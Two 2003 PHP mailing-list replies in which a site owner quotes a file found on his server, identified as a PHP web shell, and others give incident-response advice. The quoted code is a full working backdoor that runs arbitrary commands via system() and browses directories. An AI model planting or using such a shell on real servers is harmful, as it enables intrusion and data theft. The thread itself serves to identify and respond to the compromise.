Re: [PHP] Possible My Website was hacked... with PHP... please tellme what this is???
Looks like it is a PHP script to give people shell access as the web server user. On Thu, 2003-07-31 at 02:06, Joe Harman wrote: I found this on my server... I have no idea what it is... can someone tell me what it does... Thanks -- html head titlePHP Shell - CP/title /head body bgcolor=#FF text=#33 link=#00 vlink=#00 alink=#00 h1 align=centerfont size=+4 face=verdanaCrime Perfect/fontbr font face=Tahoma size=+1PHP Shell - by _m4st3r_c0d3/font/h1 ?php /* First we check if there has been asked for a working directory. */ if (isset($work_dir)) { /* A workdir has been asked for - we chdir to that dir. */ chdir($work_dir); $work_dir = exec(pwd); } else { /* No work_dir - we chdir to $DOCUMENT_ROOT */ chdir($DOCUMENT_ROOT); $work_dir = $DOCUMENT_ROOT; } ? form name=myform action=?php echo $PHP_SELF ? method=post pbDiretoacute;rio em que vocecirc; estaacute; no momento: ?php $work_dir_splitted = explode(/, substr($work_dir, 1)); echo a href=\$PHP_SELF?work_dir= . urlencode($url) . /command= . urlencode($command) . \Root/a/; if ($work_dir_splitted[0] == ) { $work_dir = /; /* Root directory. */ } else { for ($i = 0; $i count($work_dir_splitted); $i++) { /* echo i = $i;*/ $url .= /.$work_dir_splitted[$i]; echo a href=\$PHP_SELF?work_dir= . urlencode($url) . command= . urlencode($command) . \$work_dir_splitted[$i]/a/; } } ? /b/p pbEscolha abaixo o diretoacute;rio em que deseja ir:/b/p select name=work_dir onChange=this.form.submit() ?php /* Now we make a list of the directories. */ $dir_handle = opendir($work_dir); /* Run through all the files and directories to find the dirs. */ while ($dir = readdir($dir_handle)) { if (is_dir($dir)) { if ($dir == .) { echo option value=\$work_dir\ selectedCurrent Directory/option\n; } elseif ($dir == ..) { /* We have found the parent dir. We must be carefull if the parent directory is the root directory (/). */ if (strlen($work_dir) == 1) { /* work_dir is only 1 charecter - it can only be / */ } elseif (strrpos($work_dir, /) == 0) { /* The last / in work_dir were the first charecter. This means that we have a top-level directory eg. /bin or /home etc... */ echo option value=\/\Parent Directory/option\n; } else { /* We do a little bit of string-manipulation to find the parent directory... Trust me - it works :-) */ echo option value=\. strrev(substr(strstr(strrev($work_dir), /), 1)) .\Parent Directory/option\n; } } else { if ($work_dir == /) { echo option value=\$work_dir$dir\$dir/option\n; } else { echo option value=\$work_dir/$dir\$dir/option\n; } } } } closedir($dir_handle); ? /select pbDigite abaixo os comandos que deseja executar:/b/p input type=text name=command size=60 ?php if ($command) { echo value=\$command\;} ? input name=submit_btn type=submit value=Execute Command/p pLigar/Ativar codestderr/code-trapping? input type=checkbox name=stderr/p pbAbaixo, terminal onde apareceraacute; os resultados dos comandos que vocecirc; executou/b/p p textarea cols=80 rows=20 readonly ?php if ($command) { if ($stderr) { system($command . 1 /tmp/output.txt 21; cat /tmp/output.txt; rm /tmp/output.txt); } else { system($command); } } ? /textarea /p /form pbCrime Perfect 2003 /b/p pbBy _m4st3r_c0d3 - #crimeperfect/b/p /div /body /html Joe Harman http://www.HarmanMedia.com Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - Albert Einstein -- -~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~- John Coggeshall http://www.coggeshall.org/ john at coggeshall dot org The PHP Developer's Handbook The definitive PHP5 developer's guide http://www.php-handbook.com/ -~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Possible My Website was hacked... with PHP... please tellme what this is???
trolling! ha binc2 wrote: Hi guys what does trolling mean? Never heard of it before. Angelo -Original Message- From: Joel Rees [EMAIL PROTECTED] To: Joe Harman [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 31 Jul 2003 16:10:24 +0900 Subject: Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is??? Assuming you are not just trolling, Fortunatly I don't think they were doing something correctly, cause it didn't deface my site like some of the others Don't count on it. They only deface servers they don't want to use. ... everyone can execute shell commands via system(); on your server. - delete the script ;) Oh, by all means, delete it if you want. But it's not the hole it came in through, and it's not the real backdoor. It's so blatent, I'd guess it's a script kiddy or a decoy. Even if it's a script kiddy, you _want_ to know how it got on the box. I'd take the box offline, back up all the data and configuration files, and re-install the whole system and all programs from scratch. Go over every configuration file with a fine-tooth comb. If the machine is on a subnet and I controlled the subnet, I think I'd take the whole subnet down, including the firewall, and clean every machine up, not putting any machine back on the subnet until it was clean and any holes patched. If I didn't control the subnet, I'd make sure the persons who did know there had been a break-in. And if you have any valuable data, consider it to have been stolen. If you have credit card numbers, report the possibility of theft to the credit card companies. Etc. If you're trolling, go away. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php